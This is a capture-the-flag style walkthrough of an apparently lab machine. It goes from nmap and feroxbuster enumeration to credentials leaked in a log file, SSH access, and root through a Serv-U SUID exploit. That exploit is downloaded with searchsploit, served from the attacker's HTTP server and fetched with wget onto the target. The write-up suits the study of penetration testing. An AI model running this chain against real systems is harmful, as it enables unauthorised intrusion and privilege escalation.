RATING
Intermediate
ENUMERATION
We kick things off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.211
Navigating to the target in our browser, all we see is a default apache2 page:
Directory bruteforcing with feroxbuster yields us 2 interesting entries, http://192.168.201.211/election/admin/ and http://192.168.201.211/election/admin/logs/:
Command: feroxbuster -u http://192.168.201.211/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k --quiet -s 200 301 302
Navigating to http://192.168.201.211/election/admin/ brings us to a login page. We try some default credentials, but it’s a no go, so we move on:
Navigating to http://192.168.201.211/election/admin/logs/, we discover a system.log file:
We download the system.log file and examine is to reveal love:P@$$w0rd@123 as a username and password:
EXPLOITATION
We use these credentials to log into the target as user love via SSH:
Command: ssh [email protected]
PRIVILEGE ESCALATION
We check for binaries with the SUID bit set and spot a rather unusual binary named Serv-U:
Command: find / -perm -u=s -type f 2>/dev/null
Back on our local machine, we use searchsploit to look for an privesc exploit for Serv-U:
Command: searchsploit Serv-U
We proceed to download the exploit 47009.c to our local machine:
Command: searchsploit -m 47009.c
We transfer the exploit over to the target machine to compile and execute:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.153/47009.c (on target)
Compiling and executing this exploit give us a shell as root and we can read our proof.txt:
Command: gcc 47009.c -o servu
Command: ./servu
